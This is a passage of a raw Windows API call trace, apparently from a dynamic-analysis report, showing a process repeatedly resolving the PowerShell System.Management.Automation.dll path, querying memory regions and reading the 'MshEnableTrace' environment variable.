lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.028] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.037] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.037] CoTaskMemFree (pv=0x1ef390) [0080.045] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.068] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.068] CoTaskMemFree (pv=0x1ef390) [0080.070] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.070] CoTaskMemFree (pv=0x1ef390) [0080.073] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.073] CoTaskMemFree (pv=0x1ef390) [0080.079] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.079] CoTaskMemFree (pv=0x1ef390) [0080.081] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.082] CoTaskMemFree (pv=0x1ef390) [0080.082] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.082] CoTaskMemFree (pv=0x1ef390) [0080.088] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.094] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.199] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.204] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0080.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.204] CoTaskMemFree (pv=0x1ef390) [0080.482] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1ef7d0 [0080.483] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1ef8e0 [0080.683] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.793] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.797] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.797] VirtualQuery (in: lpAddress=0xc9ec0, lpBuffer=0xcad80, dwLength=0x30 | out: lpBuffer=0xcad80*(BaseAddress=0xc9000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.821] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.822] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.823] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.823] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.823] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.823] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.823] VirtualQuery (in: lpAddress=0xcb470, lpBuffer=0xcc330, dwLength=0x30 | out: lpBuffer=0xcc330*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.824] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.824] CoTaskMemFree (pv=0x1ef9f0) [0080.828] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.828] CoTaskMemFree (pv=0x1ef9f0) [0080.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.907] VirtualQuery (in: lpAddress=0xcb720, lpBuffer=0xcc5e0, dwLength=0x30 | out: lpBuffer=0xcc5e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.915] VirtualQuery (in: lpAddress=0xcb720, lpBuffer=0xcc5e0, dwLength=0x30 | out: lpBuffer=0xcc5e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, 